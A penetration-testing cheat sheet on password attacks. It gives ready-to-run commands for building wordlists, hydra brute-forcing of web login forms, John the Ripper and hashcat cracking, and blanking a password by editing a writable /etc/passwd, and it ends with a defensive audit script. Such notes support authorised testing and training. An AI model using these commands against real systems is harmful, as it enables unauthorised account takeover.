# Password Attacks

## Username Custom Wordlist

A username list can be generated with username-anarchy:

{% code overflow="wrap" %}

```
ruby username-anarchy/username-anarchy -i username.txt -f flast,f.last,first.last,last.first
```

{% endcode %}

## Bruteforcing WebApps

When a web application's login form needs to be brute-forced, use cewl to build a wordlist from the site:

```
cewl http://postfish.off/team.html -m 5 -w team.txt
```

Then use the wordlist with hydra.

Normal:

{% code overflow="wrap" %}

```
hydra -l user -P /usr/share/wordlists/rockyou.txt <ip> http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"
```

{% endcode %}

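Here `Login failed. Invalid` is the string hydra looks for in the response to know that the login was not successful.

`fm_usr` is the username form parameter; `^PASS^` marks where each candidate password is substituted.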

Base64 (`^USER64^` and `^PASS64^` send the username and password Base64-encoded):

{% code overflow="wrap" %}

```
hydra -I -f -L custom-wordlist.txt -P custom-wordlist.txt 'http-post-form://192.168.227.61:8081/:username=^USER64^&password=^PASS64^:<failure string>'
```

{% endcode %}

## JohnTheRipper

To crack a hash:

{% code title="--wordlist to specify wordlist" %}

```bash
john --format=sha256 hashes_to_crack.txt
```

{% endcode %}

| **Tool**                | **Description**                               |
| ----------------------- | --------------------------------------------- |
| `pdf2john`              | Converts PDF documents for John               |
| `ssh2john`              | Converts SSH private keys for John            |
| `mscash2john`           | Converts MS Cash hashes for John              |
| `keychain2john`         | Converts OS X keychain files for John         |
| `rar2john`              | Converts RAR archives for John                |
| `pfx2john`              | Converts PKCS#12 files for John               |
| `truecrypt_volume2john` | Converts TrueCrypt volumes for John           |
| `keepass2john`          | Converts KeePass databases for John           |
| `vncpcap2john`          | Converts VNC PCAP files for John              |
| `putty2john`            | Converts PuTTY private keys for John          |
| `zip2john`              | Converts ZIP archives for John                |
| `hccap2john`            | Converts WPA/WPA2 handshake captures for John |
| `office2john`           | Converts MS Office documents for John         |
| `wpa2john`              | Converts WPA/WPA2 handshakes for John         |

To mutate a password list with hashcat rules:

```bash
hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
```

If the `/etc/passwd` file is editable, delete the `x` in the account's password field (the `x` indicates that the hash is stored in `/etc/shadow`).

**Algorithm Types**

* `$1$` – MD5
* `$2a$` – Blowfish
* `$2y$` – Eksblowfish
* `$5$` – SHA-256
* `$6$` – SHA-512
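
The prefixes above and the `x` placeholder can be checked from the defensive side. The following is an added example, not part of the original notes: it audits passwd/shadow-style lines for empty password fields and identifies the hash scheme of each entry. The function names, the `WEAK` policy and the sample lines are assumptions made for illustration.

```python
"""Audit passwd/shadow-style lines: empty password fields and hash schemes."""

# Prefix id -> scheme, exactly as listed on this page.
SCHEMES = {"1": "MD5", "2a": "Blowfish", "2y": "Eksblowfish",
           "5": "SHA-256", "6": "SHA-512"}
WEAK = {"MD5"}  # assumption: this audit flags MD5-crypt as too weak to keep


def classify(field):
    """Return (status, scheme) for the second field of a passwd/shadow line."""
    if field == "":
        return "EMPTY", None              # no password required at all
    if field == "x":
        return "SHADOWED", None           # hash is stored in /etc/shadow
    if field[0] in "!*":
        return "LOCKED", None             # password login disabled
    parts = field.split("$")              # "$6$salt$hash" -> ["", "6", "salt", "hash"]
    if len(parts) >= 4 and parts[0] == "":
        scheme = SCHEMES.get(parts[1], "unknown id " + parts[1])
        return ("WEAK" if scheme in WEAK else "HASHED"), scheme
    return "UNRECOGNISED", None           # format not covered by the list above


def audit(lines):
    """Yield (user, status, scheme) for every well-formed account line."""
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue
        status, scheme = classify(fields[1])
        yield fields[0], status, scheme


# Constructed sample input (not real accounts or real hashes).
SAMPLE = """\
root::0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:$6$rounds=5000$examplesalt$EXAMPLEHASH:19000:0:99999:7:::
bob:$1$examplesalt$EXAMPLEHASH:19000:0:99999:7:::
svc:!:19000:0:99999:7:::
""".splitlines()

if __name__ == "__main__":
    for user, status, scheme in audit(SAMPLE):
        print(f"{user:8} {status:12} {scheme or '-'}")
```

Entries reported as `EMPTY` or `WEAK` are the ones to fix first; `/etc/passwd` itself should be writable only by root.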

